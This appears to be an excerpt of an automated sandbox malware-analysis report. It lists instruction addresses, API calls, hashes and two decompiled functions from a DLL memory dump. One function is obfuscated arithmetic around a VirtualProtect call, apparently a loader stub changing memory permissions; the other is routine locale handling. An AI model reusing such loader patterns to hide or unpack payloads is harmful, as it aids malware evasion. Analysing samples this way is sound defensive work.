    0x6e1fce5b
    0x6e1fce5d
    0x6e1fcdd2
    0x6e1fcdd2
    0x6e1fcde3
    0x6e1fcde9
    0x6e1fcdef
    0x6e1fcdf5
    0x6e1fce03
    0x6e1fce0b
    0x6e1fce0b
    0x6e1fce63
    0x6e1fce67
    0x6e1fce7b
    0x6e1fce7e
    0x6e1fce92
    0x6e1fce98
    0x6e1fce9f
    0x6e1fcea2
    0x6e1fcea9
    0x6e1fceb0
    0x6e1fcebc
    0x6e1fcec2
    0x6e1fcec7
    0x6e1fcedc
    0x6e1fcedd
    0x6e1fcee2
    0x6e1fcef5
    0x6e1fcef6
    0x6e1fcef6
    0x6e1fcefc
    0x6e1fcf02
    0x6e1fcf07
    0x6e1fcf07
    0x6e1fcf11
    0x6e1fcf17
    0x6e1fcf1c
    0x6e1fcf29
    0x6e1fcf3c
    0x6e1fcf42
    0x6e1fcf4f
    0x6e1fcf50
    0x6e1fcf56
    0x6e1fcf5c
    0x6e1fcf61
    0x6e1fcf67
    0x6e1fcf69
    0x6e1fcf79
    0x6e1fcf79
    0x6e1fcf85
    0x6e1fcf88
    0x6e1fcfa7
    0x6e1fcfad
    0x6e1fcfb9
    0x6e1fcfba
    0x6e1fcfba
    0x6e1fcfbc
    0x6e1fcf6b
    0x6e1fcf6b
    0x6e1fcf71
    0x6e1fcf77
    0x00000000
    0x00000000
    0x6e1fcf77
    0x6e1fcf69
    0x6e1fcf67
    0x6e1fcfde
    0x6e1fcfe4
    0x6e1fd01d
    0x6e1fd02d
    0x6e1fd033
    0x6e1fd039
    0x6e1fd03e
    0x6e1fd04b
    0x6e1fd04b
    0x6e1fd051
    0x6e1fcfe6
    0x6e1fcfe6
    0x6e1fcfeb
    0x6e1fcff1
    0x6e1fcff5
    0x6e1fcffb
    0x6e1fd00f
    0x6e1fd00f
    0x6e1fd067
    0x6e1fd073
    0x6e1fd07d
    0x6e1fd094
    0x6e1fd0ab
    0x6e1fd0ab
    0x6e1fd0ad
    0x6e1fd0ad
    0x6e1fd0b2
    0x6e1fd0b6
    0x6e1fd0b8
    0x6e1fd0be
    0x6e1fd0c3
    0x6e1fd0c7
    0x6e1fd0d1
    0x6e1fd0de
    0x6e1fd0de
    0x6e1fd0e4
    0x6e1fd0e4
    0x6e1fd0e9
    0x6e1fd0f8
    0x6e1fd118
    0x6e1fd11e
    0x6e1fd15e
    0x6e1fd168
    0x6e1fd16f
    0x6e1fd185
    0x6e1fd18b
    0x6e1fd1a3
    0x6e1fd1a8
    0x6e1fd1a8
    0x6e1fd1aa
    0x6e1fd120
    0x6e1fd120
    0x6e1fd130
    0x6e1fd136
    0x6e1fd13b
    0x6e1fd141
    0x6e1fd150
    0x6e1fd157
    0x6e1fd157
    0x6e1fd1bc
    0x6e1fd1c4
    0x6e1fd1ca
    0x6e1fd1d7
    0x6e1fd1df
    0x6e1fd1e5
    0x6e1fd1ec
    0x6e1fd1f2
    0x6e1fd1fe
    0x6e1fd204
    0x6e1fd210
    0x6e1fd216
    0x6e1fd221
    0x6e1fd226
    0x6e1fd229
    0x6e1fd22e
    0x6e1fd236
    0x6e1fd23c
    0x6e1fd248
    0x6e1fd24e
    0x6e1fd250
    0x6e1fd260
    0x6e1fd260
    0x6e1fd273
    0x6e1fd278
    0x6e1fd29d
    0x6e1fd2a3
    0x6e1fd2b5
    0x6e1fd2b7
    0x6e1fd2bd
    0x6e1fd252
    0x6e1fd258
    0x6e1fd25e
    0x00000000
    0x00000000
    0x6e1fd25e
    0x6e1fd250
    0x6e1fd2c9
    0x6e1fd2d0
    0x6e1fd2d7
    0x6e1fd2e5
    0x6e1fd2e6
    0x6e1fd2e6
    0x6e1fd2e8
    0x6e1fd2e8
    0x6e1fd216
    0x6e1fd2fc
    0x6e1fd302
    0x6e1fd304
    0x6e1fd311
    0x6e1fd317
    0x6e1fd32f
    0x6e1fd337
    0x6e1fd33d
    0x6e1fd347
    0x6e1fd34d
    0x6e1fd35b
    0x6e1fd361
    0x6e1fd370
    0x6e1fd375
    0x6e1fd375
    0x6e1fd377
    0x6e1fd377
    0x6e1fd302
    0x6e1fd37c
    0x6e1fd380
    0x6e1fd394
    0x6e1fd39a
    0x6e1fd3a7
    0x6e1fd3b1
    0x6e1fd3b7
    0x6e1fd3bd
    0x6e1fd3ca
    0x6e1fd3d7
    0x6e1fd3df
    0x6e1fd3f2
    0x6e1fd3f2
    0x6e1fd3f8
    0x6e1fd3f8
    0x6e1fd40b
    0x6e1fd40e
    0x6e1fd412
    0x6e1fd416
    0x6e1fd41c
    0x6e1fd422
    0x6e1fd435
    0x6e1fd414
    0x6e1fd43c
    0x6e1fd445
    0x6e1fd445
    0x6e1fd44b
    0x6e1fd44b
    0x6e1fd457
    0x6e1fd468
    0x6e1fd46b
    0x6e1fd46f
    0x6e1fd48d
    0x6e1fd471
    0x6e1fd49c
    0x6e1fd49c
    0x6e1fd49f
    0x6e1fd49f
    0x6e1fd46f
    0x6e1fd4a4
    0x6e1fd4aa
    0x6e1fd4b0
    0x6e1fd4b2
    0x6e1fd4c1
    0x6e1fd4e3
    0x6e1fd4e9
    0x6e1fd4f6
    0x6e1fd4f6
    0x6e1fd4f8
    0x6e1fd4f8
    0x6e1fd4fe
    0x6e1fd506
    0x6e1fd50c
    0x6e1fd518
    0x6e1fd51e
    0x6e1fd520
    0x6e1fd530
    0x6e1fd530
    0x6e1fd541
    0x6e1fd547
    0x6e1fd568
    0x6e1fd56e
    0x6e1fd57d
    0x6e1fd57f
    0x6e1fd585
    0x6e1fd522
    0x6e1fd528
    0x6e1fd52e
    0x00000000
    0x00000000
    0x6e1fd52e
    0x6e1fd520
    0x6e1fd58b
    0x6e1fd593
    0x6e1fd599
    0x6e1fd5a4
    0x6e1fd5a6
    0x6e1fd5ab
    0x6e1fd5b1
    0x6e1fd5b5
    0x6e1fd65f
    0x6e1fd665
    0x6e1fd686
    0x6e1fd68b
    0x6e1fd6e2
    0x6e1fd6e8
    0x6e1fd6ee
    0x6e1fd6f4
    0x6e1fd703
    0x6e1fd709
    0x6e1fd709
    0x6e1fd70f
    0x6e1fd715
    0x6e1fd71a
    0x6e1fd68d
    0x6e1fd68d
    0x6e1fd69c
    0x6e1fd6a2
    0x6e1fd6b9
    0x6e1fd6bf
    0x6e1fd6c5
    0x6e1fd6c5
    0x6e1fd720
    0x6e1fd72c
    0x6e1fd733
    0x6e1fd739
    0x6e1fd740
    0x6e1fd742
    0x6e1fd748
    0x6e1fd754
    0x6e1fd757
    0x6e1fd75a
    0x6e1fd75f
    0x6e1fd765
    0x6e1fd76b
    0x6e1fd771
    0x6e1fd775
    0x6e1fd86c
    0x6e1fd86f
    0x6e1fd873
    0x6e1fd881
    0x6e1fd894
    0x6e1fd875
    0x6e1fd8a6
    0x6e1fd8a6
    0x6e1fd8a9
    0x6e1fd8a9
    0x6e1fd77b
    0x6e1fd783
    0x6e1fd78d
    0x6e1fd7a1
    0x6e1fd7b0
    0x6e1fd7b0
    0x6e1fd7b2
    0x6e1fd7b2
    0x6e1fd7be
    0x6e1fd7c1
    0x6e1fd7c9
    0x6e1fd7cf
    0x6e1fd7db
    0x6e1fd7e1
    0x6e1fd7e3
    0x6e1fd7f3
    0x6e1fd7f3
    0x6e1fd803
    0x6e1fd808
    0x6e1fd82a
    0x6e1fd830
    0x6e1fd83f
    0x6e1fd841
    0x6e1fd847
    0x6e1fd7e5
    0x6e1fd7eb
    0x6e1fd7f1
    0x00000000
    0x00000000
    0x6e1fd7f1
    0x6e1fd7e3
    0x6e1fd856
    0x6e1fd856
    0x6e1fd8af
    0x6e1fd8b9
    0x6e1fd8bf
    0x6e1fd8c2
    0x6e1fd8c7
    0x00000000
    0x6e1fd5bb
    0x6e1fd5ce
    0x6e1fd5e6
    0x6e1fd5ed
    0x6e1fd5f0
    0x6e1fd5fb
    0x6e1fd601
    0x6e1fd603
    0x6e1fd611
    0x6e1fd632
    0x6e1fd638
    0x6e1fd641
    0x6e1fd641
    0x6e1fd647
    0x6e1fd647
    0x6e1fd64d
    0x00000000
    0x6e1fd5b5
    0x6e1fd8d9
    0x6e1fd8e0
    0x6e1fd8e6
    0x6e1fd8eb
    0x6e1fd8ed
    0x6e1fd8f8
    0x6e1fd900
    0x6e1fd906
    0x6e1fd918
    0x6e1fd918
    0x6e1fd91c
    0x00000000
    0x00000000
    0x6e1fd92a
    0x6e1fd930
    0x6e1fd934
    0x6e1fd94c
    0x6e1fd962
    0x6e1fd979
    0x6e1fd979
    0x6e1fd912
    0x6e1fd912
    0x6e1fd915
    0x6e1fd915
    0x6e1fd981
    0x6e1fd98b
    0x6e1fd99c
    0x6e1fd9a2
    0x6e1fd9b4
    0x6e1fd9b9
    0x6e1fd9c8
    0x6e1fd9ce
    0x6e1fd9e4
    0x6e1fd9eb
    0x6e1fd9ee
    0x6e1fd9f2
    0x6e1fd9fb
    0x6e1fda01
    0x6e1fda0c
    0x6e1fda0d
    0x6e1fda13
    0x6e1fda19
    0x6e1fda1e
    0x6e1fda24
    0x6e1fda26
    0x6e1fda36
    0x6e1fda36
    0x6e1fda45
    0x6e1fda53
    0x6e1fda61
    0x6e1fda69
    0x6e1fda73
    0x6e1fda7f
    0x6e1fda88
    0x6e1fda88
    0x6e1fda8e
    0x6e1fda28
    0x6e1fda28
    0x6e1fda2e
    0x6e1fda34
    0x00000000
    0x00000000
    0x6e1fda34
    0x6e1fda26
    0x6e1fda9a
    0x6e1fdaa1
    0x6e1fdaa9
    0x6e1fdaae
    0x6e1fdab7
    0x6e1fdab7
    0x6e1fdabd
    0x6e1fdac3
    0x6e1fdb1f
    0x6e1fdb23
    0x6e1fdb2a
    0x6e1fdb35
    0x6e1fdb3a
    0x6e1fdb40
    0x6e1fdb4d
    0x6e1fdb50
    0x6e1fdb66
    0x6e1fdb6c
    0x6e1fdb72
    0x6e1fdb77
    0x6e1fdb7d
    0x6e1fdb8f
    0x00000000
    0x6e1fdb7f
    0x6e1fdb7f
    0x6e1fdb85
    0x6e1fdb8b
    0x00000000
    0x00000000
    0x6e1fdb8d
    0x6e1fdb8b
    0x6e1fdac5
    0x6e1fdac5
    0x6e1fdac7
    0x6e1fdada
    0x6e1fdadd
    0x6e1fdae1
    0x6e1fdaf3
    0x6e1fdaf3
    0x6e1fdaf7
    0x6e1fdb05
    0x6e1fdb0b
    0x6e1fdb11
    0x6e1fdb18
    0x00000000
    0x6e1fdb13
    0x6e1fdaea
    0x6e1fdaed
    0x6e1fdaed
    0x6e1fdaf0
    0x00000000
    0x6e1fdaf0
    0x6e1fdb11
    0x6e1fdaf7
    0x6e1fdba0

    APIs
    • GetTempPathA.KERNEL32(0000070B,?,?,?,00000000), ref: 6E1FBC22
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: PathTemp
    • String ID: T$v
    • API String ID: 2920410445-3699010257
    • Opcode ID: 52a9cac35b2546286bf5ffeffc7631523303535a1bb5db91b02f8ce280686578
    • Instruction ID: ae9d80408f09305a1fabed08b1dee55ac61ba4b0e3af9c1abc00a716ad9d4fcb
    • Opcode Fuzzy Hash: 52a9cac35b2546286bf5ffeffc7631523303535a1bb5db91b02f8ce280686578
    • Instruction Fuzzy Hash: 522335B0500A04CFCB3AEF68D598B2C7BB7FB86306F10A119D1699728CE7B55985DF60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D1EB0, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 271memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E6E1D1EB0(void* __esi, intOrPtr _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _t88;
				intOrPtr _t92;
				intOrPtr _t93;
				signed int _t96;
				signed int _t98;
				intOrPtr _t110;
				intOrPtr _t116;
				signed int _t124;
				intOrPtr _t126;
				signed int _t133;
				intOrPtr _t138;
				signed int _t145;
				intOrPtr _t152;
				signed int _t159;
				long _t162;
				intOrPtr _t163;
				signed int _t168;
				signed int _t178;
				signed int _t183;
				void* _t191;
				signed int _t192;
				signed int _t196;
				intOrPtr _t200;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t218;
				signed int _t223;
				signed int _t227;
				intOrPtr _t232;
				intOrPtr _t236;
				intOrPtr _t242;
				signed int _t247;
				intOrPtr _t256;
				void* _t266;
				void* _t273;

				_v8 = 0x35;
				_v20 = 0x3177;
				_v16 =  *0x6E24B058;
				if(_v16 == 1) {
					_t88 =  *0x6e24b0d8; // 0xf1cde0
					_t152 =  *0x6e24b000; // 0x565
					 *0x6e24b000 = _t152 + _t88 - 0xb401 +  *0x6e24b008 +  *0x6e24b000;
				} else {
					_t256 =  *0x6e24b0d8; // 0xf1cde0
					 *0x6e24b000 = _t256 + 5 -  *0x6e24b008;
				}
				_t92 =  *0x6e24b000; // 0x565
				_t266 = _t92 -  *0x6e24b004; // 0xab810c7
				if(_t266 >= 0) {
					_t200 =  *0x6e24b000; // 0x565
					 *0x6e24b004 = _t200 + 5 - ( *0x6e24b0d4 & 0x000000ff);
					 *0x6EDF8BBD =  *0x6EDF8BBD - ( *0x6e24b0d4 & 0x000000ff);
					_t204 =  *0x6e24b000; // 0x565
					 *0x6e24b004 = _t204 + 5 - ( *0x6e24b0d4 & 0x000000ff);
				}
				_t93 =  *0x6e24b008; // 0xcac97647
				 *0x6e24b004 = _t93 + 5 - _v8;
				 *0x6e2e2c18 = _a8;
				_t208 = _a4;
				_t96 =  *0x6e24b004; // 0xab810c7
				_t12 = _t208 - 0x18; // 0xab810af
				 *0x6e24b008 = _t96 + _t12;
				 *0x6e24b00c = 0;
				if( *0x6E24B024 <= ( *0x6e24b0d4 & 0x000000ff)) {
					_t192 =  *0x6e24b004; // 0xab810c7
					 *0x6EDF8BBD = _t192;
					_t145 =  *0x6e24b004; // 0xab810c7
					_t16 = _t145 - 0xb401; // -46081
					 *0x6e24b000 = ( *0x6e24b0d4 & 0x000000ff) + _t16 +  *0x6e24b000 +  *0x6e24b000;
					 *0x6e24b000 = ( *0x6e24b0d4 & 0x000000ff) -  *0x6e24b004 * 0x2f;
					_t196 =  *0x6e24b004; // 0xab810c7
					 *0x6e24b000 = _t196 - 0x48 - ( *0x6e24b0d4 & 0x000000ff) +  *0x6e24b000;
				}
				_t98 =  *0x6e24b004; // 0xab810c7
				 *0x6e24b008 = _t98 + 1 - _v8;
				 *0x6e24b00c = 0;
				 *0x6e24b0d4 = ( *0x6e24b0d4 & 0x000000ff) + _v8 + _v8;
				_v36 =  *0x6E24B0E0;
				_v32 =  *0x6E24B0E4;
				if(_v36 != 1 || _v32 != 0) {
					_t159 =  *0x6e24b004; // 0xab810c7
					 *0x6e24b000 = _t159 + 5 - ( *0x6e24b0d4 & 0x000000ff);
				} else {
					_t191 = ( *0x6e24b0d4 & 0x000000ff) +  *0x6e24b000;
					_t247 =  *0x6e24b004; // 0xab810c7
					_t27 = _t191 - 0xb401; // 0xab75cc6
					 *0x6e24b000 = _t247 + _t27 +  *0x6e24b000;
				}
				asm("cdq");
				 *0x6e24b0d4 = ( *0x6e24b0d4 & 0x000000ff) +  *0x6e24b008 + _v8;
				_t162 =  *0x6e24b0f4; // 0x41
				VirtualProtect( *0x6e2e2c18, _v20, _t162,  &_v28);
				_t163 =  *0x6e24b000; // 0x565
				_t273 = _t163 -  *0x6e24b0d8; // 0xf1cde0
				if(_t273 >= 0) {
					_t242 =  *0x6e24b000; // 0x565
					 *0x6e24b0d8 = _t242 + 5 - _v8;
					 *0x6EDF8BBD =  *0x6EDF8BBD - _v8;
					_t138 =  *0x6e24b000; // 0x565
					 *0x6e24b0d8 = _t138 + 5 - _v8;
				}
				_t38 = ( *0x6e24b0d4 & 0x000000ff) + 2; // 0x37
				_t218 =  *0x6e24b008; // 0xcac97647
				_t110 =  *0x6e24b00c; // 0x0
				asm("sbb eax, ecx");
				 *0x6e24b008 = _t218 - _v8 + _t38;
				 *0x6e24b00c = _t110;
				_v12 = 0x1b;
				while(_v12 > 1) {
					if(_a4 !=  *((intOrPtr*)(0x6e24b024))) {
						_t236 =  *0x6e24b008; // 0xcac97647
						_t133 =  *0x6e24b004; // 0xab810c7
						 *0x6e24b004 = _t133 + _t236 - 0x48 - _a4;
						 *((intOrPtr*)(0x6e24b010 + _v12 * 4)) =  *((intOrPtr*)(0x6e24b010 + _v12 * 4)) + _a4;
						_t183 =  *0x6e24b004; // 0xab810c7
						 *0x6e24b008 = _t183 + 5 - _a4;
						 *0x6e24b00c = 0;
					}
					_v12 = _v12 - 1;
				}
				_t57 = _v8 - 0x18; // 0x1d
				 *0x6e24b0d4 = _v8 + _t57;
				asm("cdq");
				 *0x6e24b0d4 = ( *0x6e24b0d4 & 0x000000ff) +  *0x6e24b008 + _v8;
				_v24 =  *((intOrPtr*)(0x6e24b058));
				if(_v24 == 1) {
					_t116 =  *0x6e24b008; // 0xcac97647
					_t168 =  *0x6e24b004; // 0xab810c7
					 *0x6e24b004 = _t168 + _t116 - 0xb401 + _a4 +  *0x6e24b004;
				} else {
					_t232 =  *0x6e24b008; // 0xcac97647
					 *0x6e24b004 = _t232 + 5 - _a4;
				}
				 *0x6e24b0d4 = _v8 * 0x268e + ( *0x6e24b0d4 & 0x000000ff);
				 *0x6e24b004 = GetWindowsDirectoryA("C:\\Windows", 0x70b);
				_v12 = 0x1b;
				while(_v12 > 1) {
					if(_a4 !=  *((intOrPtr*)(0x6e24b024))) {
						_t126 =  *0x6e24b008; // 0xcac97647
						_t178 =  *0x6e24b004; // 0xab810c7
						 *0x6e24b004 = _t178 + _t126 - 0x48 - _a4;
						 *((intOrPtr*)(0x6e24b010 + _v12 * 4)) =  *((intOrPtr*)(0x6e24b010 + _v12 * 4)) + _a4;
						_t227 =  *0x6e24b004; // 0xab810c7
						 *0x6e24b008 = _t227 + 5 - _a4;
						 *0x6e24b00c = 0;
					}
					_v12 = _v12 - 1;
				}
				_push( *0x6e2e2c18);
				_t83 = ( *0x6e24b0d4 & 0x000000ff) + _v8 - 0xb401; // -46028
				_t124 = _v8 + _t83 + _v8;
				_v8 = _t124;
				_t223 =  *0x6e24b004; // 0xab810c7
				 *0x6e24b004 = _t223 + _a4 - 0xb401 +  *0x6e24b008 +  *0x6e24b004;
				return _t124;
			}














































    0x6e1d1eb7
    0x6e1d1ebe
    0x6e1d1ed3
    0x6e1d1eda
    0x6e1d1ede
    0x6e1d1ef4
    0x6e1d1efc
    0x6e1d1edc
    0x6e1d1f04
    0x6e1d1f13
    0x6e1d1f13
    0x6e1d1f19
    0x6e1d1f1e
    0x6e1d1f24
    0x6e1d1f26
    0x6e1d1f38
    0x6e1d1f5d
    0x6e1d1f63
    0x6e1d1f75
    0x6e1d1f75
    0x6e1d1f7b
    0x6e1d1f86
    0x6e1d1f8e
    0x6e1d1f94
    0x6e1d1f97
    0x6e1d1f9c
    0x6e1d1fa2
    0x6e1d1fa8
    0x6e1d1fc3
    0x6e1d1fcc
    0x6e1d1fd2
    0x6e1d1fdf
    0x6e1d1fe4
    0x6e1d1ff7
    0x6e1d200d
    0x6e1d2013
    0x6e1d202b
    0x6e1d202b
    0x6e1d2031
    0x6e1d203e
    0x6e1d2043
    0x6e1d2056
    0x6e1d206a
    0x6e1d2073
    0x6e1d207a
    0x6e1d20ab
    0x6e1d20bd
    0x6e1d2084
    0x6e1d208b
    0x6e1d2091
    0x6e1d2097
    0x6e1d20a4
    0x6e1d20a4
    0x6e1d20ca
    0x6e1d20d4
    0x6e1d20dd
    0x6e1d20ee
    0x6e1d20f4
    0x6e1d20fa
    0x6e1d2100
    0x6e1d2102
    0x6e1d210e
    0x6e1d212d
    0x6e1d2133
    0x6e1d213e
    0x6e1d213e
    0x6e1d214d
    0x6e1d2153
    0x6e1d215b
    0x6e1d2160
    0x6e1d2162
    0x6e1d2168
    0x6e1d216d
    0x6e1d217f
    0x6e1d2196
    0x6e1d219a
    0x6e1d21a6
    0x6e1d21ad
    0x6e1d21c2
    0x6e1d21c9
    0x6e1d21d7
    0x6e1d21dd
    0x6e1d21dd
    0x6e1d217c
    0x6e1d217c
    0x6e1d21eb
    0x6e1d21ef
    0x6e1d21fc
    0x6e1d2206
    0x6e1d2219
    0x6e1d2220
    0x6e1d2224
    0x6e1d2237
    0x6e1d223f
    0x6e1d2222
    0x6e1d2247
    0x6e1d2253
    0x6e1d2253
    0x6e1d2269
    0x6e1d227e
    0x6e1d2283
    0x6e1d2295
    0x6e1d22ac
    0x6e1d22b0
    0x6e1d22bb
    0x6e1d22c3
    0x6e1d22d9
    0x6e1d22e0
    0x6e1d22ee
    0x6e1d22f4
    0x6e1d22f4
    0x6e1d2292
    0x6e1d2292
    0x6e1d22fb
    0x6e1d230e
    0x6e1d2315
    0x6e1d2318
    0x6e1d2330
    0x6e1d2338
    0x6e1d233e

    APIs
    • VirtualProtect.KERNELBASE(6E24D308,00003177,00000041,0000002F,00000001), ref: 6E1D20EE
    • GetWindowsDirectoryA.KERNEL32(6E24BF88,0000070B), ref: 6E1D2278
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: DirectoryProtectVirtualWindows
    • String ID: 5$w1
    • API String ID: 2764058431-3897939640
    • Opcode ID: ce7477a3e209711fcefc8cc73899b7f59f58c04bb4cad15cfa8592efd2f63562
    • Instruction ID: 174985e8e93a918b2ec696732c812b88fbdbbb7253d8fbabac8027fbed76e7a5
    • Opcode Fuzzy Hash: ce7477a3e209711fcefc8cc73899b7f59f58c04bb4cad15cfa8592efd2f63562
    • Instruction Fuzzy Hash: 92D17A70504A18CFCB2AEF6CD698A5C7BB3FB8A306F10A159E1649734DD3B19A44DF24
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21C3CB, Relevance: 6.2, APIs: 4, Instructions: 236COMMON
    Download Yara Rule
    C-Code - Quality: 64%
    			E6E21C3CB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t34 = E6E20FA06(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6E21C35C(0x6e241530, 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6E21BCCD(_t87, _t94, _t118, __eflags); // executed
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6E21BDF0();
					} else {
						E6E21BD56(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6E21C35C(0x6e241220, 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6E21BDF0();
							} else {
								E6E21BD56(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6E21C22A(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t121 = _a12;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t15 = _t121 + 0x120; // 0x6e211a95
							_t89 = _t15;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6E21BC2D(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6E208956();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x6e24b164; // 0x1dc3c76f
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6E20FA06(_t89, _t100, _t116);
								_t122 =  *(E6E20FA06(_t90, _t100, _t116) + 0x34c);
								_t129 = E6E21CADE(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6E2182D0(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6E21CC12(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								__eflags = _v12 ^ _t132;
								return E6E203D51(_v12 ^ _t132);
							} else {
								_t68 = E6E213961(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t20 = _t121 + 0x80; // 0x6e2119f5
									_t92 = _t20;
									_t21 = _t121 + 0x120; // 0x6e211a95
									if(E6E213961(_t100, _t127, _t154, _t21, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6E21F97B(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											_t22 = _t121 + 0x120; // 0x6e211a95
											if(E6E213961(_t112, _t127, _t157, _t22, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6E21F97B(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												_t23 = _t121 + 0x100; // 0x6e211a75
												E6E21E65A(_t112, _t127, _t23, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}










































    0x6e21c3d0
    0x6e21c3d1
    0x6e21c3d2
    0x6e21c3d3
    0x6e21c3d4
    0x6e21c3d5
    0x6e21c3da
    0x6e21c3dd
    0x6e21c3df
    0x6e21c3e2
    0x6e21c3e2
    0x6e21c3e5
    0x6e21c3e5
    0x6e21c3eb
    0x6e21c3ee
    0x6e21c3f1
    0x6e21c3f1
    0x6e21c3f4
    0x6e21c3f7
    0x6e21c3fd
    0x6e21c3ff
    0x6e21c404
    0x6e21c40e
    0x6e21c413
    0x6e21c416
    0x6e21c416
    0x6e21c41a
    0x6e21c41e
    0x6e21c467
    0x00000000
    0x6e21c420
    0x6e21c425
    0x6e21c42e
    0x6e21c427
    0x6e21c427
    0x6e21c427
    0x6e21c435
    0x6e21c439
    0x6e21c443
    0x6e21c448
    0x6e21c44d
    0x6e21c453
    0x6e21c457
    0x6e21c460
    0x6e21c459
    0x6e21c459
    0x6e21c459
    0x6e21c46c
    0x6e21c46c
    0x6e21c46c
    0x6e21c44d
    0x6e21c439
